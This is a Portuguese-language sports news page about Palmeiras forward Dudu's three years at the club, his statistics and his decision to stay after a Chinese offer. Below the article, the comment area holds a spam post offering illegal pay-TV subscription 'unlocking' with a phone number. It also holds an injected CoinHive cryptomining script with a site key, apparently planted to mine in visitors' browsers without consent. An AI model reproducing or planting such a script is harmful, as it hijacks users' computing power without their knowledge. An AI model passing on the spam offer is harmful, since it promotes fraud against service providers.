Símbolo da mudança

29/1/2018 10:47

Símbolo da mudança

Por Rafael Bullara

Símbolo da mudança

Dudu chegou ao Palmeiras em 2015 (Foto: Mauro Horita/Lancepress!)



Fim da temporada de 2014. O Palmeiras escapa de ser rebaixado pela terceira vez em 12 anos e prepara grande reformulação para o ano seguinte, no início do segundo mandato de Paulo Nobre, que contrata Alexandre Mattos para liderar o processo.







Em um dos primeiros contatos com o novo dirigente, ele perguntou se era possível ser campeão brasileiro em dois anos, período em que ainda ficaria na presidência. A resposta foi positiva, mas com a ressalva de que era preciso mudar praticamente tudo. O péssimo momento era empecilho para a chegada de novos atletas e a contratação de Dudu foi a que começou a alterar aquele cenário de terra arrasada. Pretendido pelos rivais Corinthians e São Paulo, o diretor ligou para os empresários do atacante e ouviu que ainda não havia acerto com ninguém. Entrou na disputa, ganhou e a partir daí a história do atleta e do clube começaram a mudar.



Curiosamente, Dudu estreou pelo Palmeiras no dia 25 de janeiro de 2015, quando entrou no intervalo de um amistoso contra o Red Bull, no Allianz Parque. Três anos depois, na mesma data, contra o rival da primeira vez e no mesmo estádio, ele entrou em campo, mas com uma realidade totalmente diferente. Dias antes, atacante e Mattos deram entrevista do “fico” após mais uma recusa milionária da China.



Quando Dudu vestiu a camisa contra o Red Bull no passado, simbolizou a tentativa do resgate de um clube afundado em problemas. Dois títulos depois, um deles como capitão, 166 partidas, 92 vitórias, 29 empates, 45 derrotas e 42 gols marcados, ele segue como referência da equipe, agora recheada de grandes jogadores. O Allianz passou a ser a segunda casa dele. É o artilheiro do estádio com 22 gols e o segundo que mais atuou no local, com 74 atuações. Fernando Prass é o primeiro com 78 jogos, porém está na reserva e deverá ser ultrapassado em breve pelo companheiro. A família de Dudu também está adaptada a São Paulo e os filhos criaram ligação com o Palmeiras, tanto que frequentam a sede social do clube quase sempre vestidos com uniforme completo e o número do pai nas costas.



Esportivamente, a permanência significa que o elenco seguirá com um de seus líderes para buscar novas conquistas. Externamente, é um exemplo de que o patamar agora é outro para time e atleta, além de mostrar que a parceria já deu o resultado pretendido.







5892 visitas - Fonte: LANCE!Net

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade

Brasileiro

Dom - 11:00 - Heriberto Hülse -
X
Criciuma
Palmeiras

Libertadores

Qua - 21:30 - Allianz Parque
2 X 1
Palmeiras
Independiente Del Valle